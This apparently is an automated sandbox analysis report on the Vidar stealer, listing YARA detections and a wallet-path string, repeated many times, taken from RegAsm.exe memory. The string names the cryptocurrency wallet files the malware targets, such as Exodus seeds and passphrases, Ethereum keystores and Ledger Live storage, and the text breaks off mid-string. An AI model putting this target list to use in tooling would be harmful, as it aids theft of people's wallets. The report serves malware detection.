                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session 